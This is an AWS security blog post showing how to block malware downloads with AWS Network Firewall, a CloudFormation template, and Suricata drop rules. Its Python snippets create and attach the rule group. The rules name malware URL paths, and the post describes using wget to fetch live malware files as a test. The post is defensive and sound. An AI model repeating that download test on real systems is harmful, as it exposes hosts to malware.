Protecting your network and computers from security events requires multi-level strategies, and you can use network level traffic filtration as one level of defense. Users need access to the internet for business reasons, but they can inadvertently download malware, which can impact network and data security. This post describes how to use custom Suricata Rules with AWS Network Firewall to add protections that prevent users from downloading malware. You can use your own internal list, or a list from commercial or open-source threat intelligence feeds.

Network Firewall is a managed service that makes it easy to deploy essential network protection for all of your Amazon Virtual Private Cloud (Amazon VPC) Infrastructure. Network Firewall’s flexible rules engine lets you define firewall rules, giving you fine-grained control over network traffic, such as blocking outbound requests to prevent the spread of potential malware.

Features of Network Firewall

This section describes features of Network Firewall that help improve the overall security of your network.

Network Firewall:

  • Is a managed Amazon Web Services (AWS) service, so you don’t have to build and maintain the infrastructure to host the network firewall.
  • Integrates with AWS Firewall Manager, which allows you to centrally manage security policies and automatically enforce mandatory security policies across existing and newly created accounts and virtual private clouds (VPCs).
  • Protects application availability by filtering inbound internet traffic using tools such as access control list (ACL) rules, stateful inspection, protocol detection, and intrusion prevention.
  • Provides URL, IP address, and domain-based outbound traffic filtering to help you meet compliance requirements, stop potential data leaks, and block communication with known malware hosts.
  • Gives you control and visibility of VPC-to-VPC traffic to logically separate networks that host sensitive applications or line-of-business resources.
  • Complements existing network and application security services on AWS by providing control and visibility to layer 3 through 7 network traffic for your entire VPC.

Automating the deployment of Network Firewall and the management of its rules supports management at scale and helps ensure a timely response, because Network Firewall is designed to block access to insecure sites before they impact your resources. For the solution in this blog post, you’ll use an AWS CloudFormation template to deploy the network architecture with Network Firewall.

Solution architecture

Figure 1 shows a sample architecture to demonstrate how users are able to download malware files, and how you can prevent this using network firewall rules.

Network Firewall is deployed in a single VPC architecture, where it is placed in line with the traffic to and from the internet.

Figure 1. Network architecture diagram

The network architecture shown in Figure 1 includes three subnets:

  1. A network firewall subnet
    Hosts the Network Firewall endpoint interface. All outbound traffic from this network goes through the internet gateway.
  2. A public subnet
    Hosts a NAT gateway. The next hop from the public subnet is the Network Firewall endpoint, where all traffic can be inspected before being forwarded to the internet.
  3. A private network subnet
    Used to host the client instances. All outbound traffic from this network goes to the NAT gateway endpoint.

In the network architecture shown in Figure 1, only one Availability Zone is shown for simplicity, but best practice is to deploy infrastructure across multiple AZs.

To run the CloudFormation deployment template

  1. To set up the architecture shown in Figure 1, launch the provided CloudFormation deployment template by selecting the Launch Stack button below.
    This CloudFormation template:

    • Sets up VPCs and the subnets required by the network architecture.
    • Creates a route table with the appropriate routes and attaches it to the appropriate subnet (private subnet, firewall subnet, public subnet).
    • Creates a test instance with appropriate security groups.
    • Deploys Network Firewall with a firewall policy.
    • Creates a rule group named SampleStatefulRulegroupName with Suricata rules, which is not attached to a firewall policy.
  2. Name the newly created stack (for example, nfw-stack).
  3. Note that the template also installs two sample rules that will be used to protect against access to two sample malware site URLs, but it does not automatically attach them to a firewall policy.
  4. You can see that Network Firewall with its firewall policy was deployed as part of the basic CloudFormation deployment. The template also created Suricata rules in a rule group, but that rule group is not yet attached to the firewall policy.

    Note: Unless you attach the rule group to the Network Firewall policy, it will not provide the required protection.
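If you prefer to launch the stack from code rather than the console, a sketch like the following would work, assuming you have saved a local copy of the provided template as nfw-template.yaml (a hypothetical filename) and that the template creates IAM resources for the test instance:

```python
# A hedged sketch of launching the stack programmatically instead of via the
# Launch Stack button; "nfw-template.yaml" is a hypothetical local copy of the
# provided template, not an official URL.
import boto3

cfn = boto3.client("cloudformation")

with open("nfw-template.yaml") as f:
    template_body = f.read()

cfn.create_stack(
    StackName="nfw-stack",                  # matches the example stack name used above
    TemplateBody=template_body,
    Capabilities=["CAPABILITY_NAMED_IAM"],  # likely needed if the template creates IAM resources
)

# Block until the stack finishes creating.
cfn.get_waiter("stack_create_complete").wait(StackName="nfw-stack")
```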

Example: confirming vulnerability

We have identified two sample URLs that contain malware to use for demonstration.

In the example screenshot below, we tested the vulnerability by logging in to the test instance using AWS Session Manager and, at the shell prompt, using wget to access and download a malware file.

Figure 2 that follows is a screenshot of how a user could access and download two different malware files.

Note: Since these URLs contain malware files, we do not recommend users perform this test, but are providing a screenshot as a demonstration. If you wish to actually test the ability to download files, use URLs you know are safe for testing.

Figure 2. Insecure URL access

Network Firewall policies

Before the template creates the Network Firewall rule group, it creates a Network Firewall policy and attaches it to the Network Firewall. An AWS Network Firewall firewall policy defines the monitoring and protection behavior for a firewall. The details of the behavior are defined in the rule groups that you add to your policy.

Network Firewall rules

A Network Firewall rule group is a reusable set of criteria for inspecting and handling network traffic. You can add one or more rule groups to a firewall policy as part of policy configuration. The included template does this for you.

Network Firewall rule groups are either stateless or stateful. Stateless rule groups evaluate packets in isolation, while stateful rule groups evaluate them in the context of their traffic flow. Network Firewall uses a Suricata rules engine to process all stateful rules.

Suricata rules can be used to create a Network Firewall stateful rule to prevent insecure URL access. Figure 3 shows the Suricata rules that the template adds and attaches to the Network Firewall policy in order to block access to the sample malware URLs used in the previous example.

Figure 3. Suricata rules in a Network Firewall rule group

Attach the rule group to the Network Firewall policy

When you launched the CloudFormation template, it automatically created these rules in the rule group. You will now be attaching this rule group to the firewall policy in order to enable the protection. You will need similar rules to block the test URLs that are used for your testing.

Figure 3 shows two Suricata rules that have been configured to block the insecure malware URLs.

To add Suricata rules to Network Firewall

To improve site security and protect against downloading malware, you can add Suricata rules to Network Firewall to secure your site. You’ll do this by:

  1. Creating and attaching a firewall policy to the Network Firewall.
  2. Creating rules as part of rule groups, which are attached to the firewall policy.
  3. Testing to verify that access to malware URLs from the instance is blocked.

Let’s review the Suricata rules that were created and can be attached to Network Firewall.

Suricata rule parts

Each Suricata rule has three parts:

  1. Action
    drop – the action that should be taken.

  2. Header
    http – the traffic protocol.

    $HOME_NET any – $HOME_NET is a Suricata variable; by default it is set to the CIDR range of the VPC where Network Firewall is deployed. any refers to any source port.

    $EXTERNAL_NET 80 – $EXTERNAL_NET is a standard Suricata variable that refers to the traffic destination, and 80 refers to the destination port.

    -> – the direction, which tells in which direction the signature has to match.

  3. Options
    msg “MALWARE custom solution” – gives textual information about the signature and the possible alert.

    flow to_server,established – used to match on the direction of the flow; established refers to matching only on established connections.

    classtype trojan-activity – gives information about the classification of rules and alerts.

    sid:xxxxx – gives every signature its own ID.

    content “xxxx” – this keyword identifies the pattern that your signature should match.

    http_uri – a content modifier that restricts the match to the request URI only.

    rev:xxx – goes along with the sid keyword and represents the version of the signature.

The signatures in the Suricata rules shown in Figure 3 will block traffic that matches the http_uri contents /data/js_crypto_miner.html and /data/java_jre17_exec.html when the traffic is initiated from the VPC to the public network.
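Putting those parts together, the rule group could also be created programmatically. The sketch below embeds two signatures equivalent to the ones described above in a boto3 create_rule_group call; the capacity and sid values are illustrative, and the rule group name matches the one the CloudFormation template creates:

```python
# A sketch of creating the stateful rule group outside CloudFormation, with
# the two Suricata signatures described above supplied as a rules string.
import boto3

nfw = boto3.client("network-firewall")

suricata_rules = (
    'drop http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"MALWARE custom solution"; '
    'flow:to_server,established; content:"/data/js_crypto_miner.html"; http_uri; '
    'classtype:trojan-activity; sid:1000001; rev:1;)\n'
    'drop http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"MALWARE custom solution"; '
    'flow:to_server,established; content:"/data/java_jre17_exec.html"; http_uri; '
    'classtype:trojan-activity; sid:1000002; rev:1;)\n'
)

nfw.create_rule_group(
    RuleGroupName="SampleStatefulRulegroupName",  # name used by the CloudFormation template
    Type="STATEFUL",
    Capacity=100,            # illustrative capacity
    Rules=suricata_rules,    # Suricata-format rules string
    Description="Block known malware URLs",
)
```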

To attach a rule group to an existing Network Firewall

In Figure 4, the Network Firewall has a policy attached, but it does not have a rule group.

Figure 4. A policy is attached, but not a rule group

  1. As shown in Figure 5, choose Add rule group to start adding your Suricata rule to the Network Firewall.
  2. Choose Add from existing stateful rule groups to attach an already created Suricata rule group.

    Figure 5. Choose Add rule group

  3. Figure 6 shows the Suricata rule groups that are already created. SampleStatefulRulegroupName is the rule group created by the CloudFormation template.
  4. Select the rule group and choose Add stateful rule group to finish adding the rule group to Network Firewall.

    Figure 6. Review the rule groups that are already created

  5. Figure 7 shows that the rule group SampleStatefulRulegroupName is now part of the Stateful rule group section of the Network Firewall screen, which completes adding Suricata rules to Network Firewall.

    Figure 7. The new rule group is now added
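The same attachment can be done with the AWS CLI or SDK instead of the console. Here is a sketch with boto3, assuming a hypothetical firewall policy name of nfw-stack-policy (use the name your stack actually created):

```python
# A sketch of attaching the existing stateful rule group to the firewall policy.
import boto3

nfw = boto3.client("network-firewall")

# Fetch the current policy and its update token (required for optimistic locking).
resp = nfw.describe_firewall_policy(FirewallPolicyName="nfw-stack-policy")  # hypothetical name
policy = resp["FirewallPolicy"]
update_token = resp["UpdateToken"]

# Look up the ARN of the rule group created by the CloudFormation template.
rule_group_arn = nfw.describe_rule_group(
    RuleGroupName="SampleStatefulRulegroupName", Type="STATEFUL"
)["RuleGroupResponse"]["RuleGroupArn"]

# Add the stateful rule group reference and push the updated policy back.
policy.setdefault("StatefulRuleGroupReferences", []).append({"ResourceArn": rule_group_arn})

nfw.update_firewall_policy(
    UpdateToken=update_token,
    FirewallPolicyName="nfw-stack-policy",
    FirewallPolicy=policy,
)
```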

Example: validating the solution

Your Network Firewall is now configured to block the malware URLs that are defined in the rule group SampleStatefulRulegroupName.

As in the example above where we confirmed vulnerability, Figure 8 shows how to validate that the solution is now protecting your users from accessing malware sites.

Figure 8 shows a user trying to access the same insecure URLs we tested earlier and shows that the URLs are now blocked and the attempted connection times out.

Note: Since these URLs contain malware files, we do not recommend users perform this test, but are providing a screenshot as a demonstration. If you wish to actually test the ability to download files, use URLs you know are safe for testing.

Figure 8. Insecure URL access blocked

Validating that access is blocked helps your security team ensure that users or applications on your network cannot download malware. You can add similar rules for any URLs you identify as insecure. SOC operators are typically not familiar with updating CloudFormation templates, but you can use a deployment pipeline in which the data required for the rules is stored in Amazon DynamoDB and AWS Lambda functions automate updating the rules.
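As a sketch of that automation idea, a Lambda function along these lines could rebuild the rule group from a hypothetical DynamoDB table named malware-url-list whenever the list changes; the table schema, sid numbering, and rule template are assumptions for illustration, not part of the provided solution:

```python
# A hedged sketch: regenerate the stateful rule group from a DynamoDB table of
# URL paths, so SOC operators never have to touch the CloudFormation template.
import boto3

dynamodb = boto3.resource("dynamodb")
nfw = boto3.client("network-firewall")

RULE_GROUP = "SampleStatefulRulegroupName"

RULE_TEMPLATE = (
    'drop http $HOME_NET any -> $EXTERNAL_NET 80 '
    '(msg:"MALWARE custom solution"; flow:to_server,established; '
    'content:"{path}"; http_uri; classtype:trojan-activity; sid:{sid}; rev:1;)'
)


def handler(event, context):
    # 1. Read the current list of URL paths to block (hypothetical table and attribute).
    items = dynamodb.Table("malware-url-list").scan()["Items"]
    rules = "\n".join(
        RULE_TEMPLATE.format(path=item["path"], sid=1000000 + i)
        for i, item in enumerate(items, start=1)
    )

    # 2. Fetch the rule group's update token and replace its rules string.
    current = nfw.describe_rule_group(RuleGroupName=RULE_GROUP, Type="STATEFUL")
    nfw.update_rule_group(
        UpdateToken=current["UpdateToken"],
        RuleGroupArn=current["RuleGroupResponse"]["RuleGroupArn"],
        Rules=rules,
    )
```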

Now that you have an example running, you should implement a complete rule set that meets your requirements, based on a publicly available malware list such as the CIS Security malware list.

Cleanup

AWS resources created for testing can result in additional costs. Since this environment used a CloudFormation template, you can remove all AWS resources associated with the solution by deleting the CloudFormation stack you named previously (for example, nfw-stack).

Conclusion

This blog describes an approach for preventing users from downloading malware. The solution presented uses AWS Network Firewall to secure your environment by blocking access to the specified malware URLs. The supplied CloudFormation template can be used to automate this protection, and to easily set up a test environment to simulate the scenario.

For additional best practice information, see:

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.


Want more AWS Security news? Follow us on Twitter.

Author

Ajit Puthiyavettle

Ajit is a Solution Architect working with enterprise clients, architecting solutions to achieve business outcomes. He is passionate about solving customer challenges with innovative solutions. His experience is with leading DevOps and security teams for enterprise and SaaS (Software as a Service) companies.
